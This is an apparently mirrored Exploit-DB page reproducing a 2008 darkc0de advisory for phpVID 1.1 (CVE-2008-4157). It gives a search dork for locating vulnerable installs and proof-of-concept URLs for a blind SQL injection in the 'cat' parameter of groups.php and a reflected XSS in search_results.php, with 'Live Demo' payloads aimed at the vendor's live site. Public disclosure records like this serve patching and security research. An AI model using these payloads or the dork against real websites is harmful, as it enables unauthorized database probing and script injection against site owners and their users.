- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6422
- Проверка EDB
-
- Пройдено
- Автор
- R45C4L
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4157
- Дата публикации
- 2008-09-10
Код:
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : [email protected]
#
# Share the c0de!
#
################################################################
#
# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities
#
# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html
# Vulnerable Version: 1.1
#
###########################################################
#
# d0rk:Powered By Vastal I-Tech's phpVID.
#
#
###########################################################
Vulnerabilities
Blind SQL Injection in "groups.php" in the "cat" parameter.
Cross Site Scripting in "search_results.php"
POC:
http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
http://www.site.com/search_results.php?query=[XSS]
Live Demo:
http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
http://www.phpvid.com/search_results.php?query=<script>alert(0);</script>
###########################################################
#
# Bug discovered : 10 Sep.2008
###########################################################
# milw0rm.com [2008-09-10]
- Источник
- www.exploit-db.com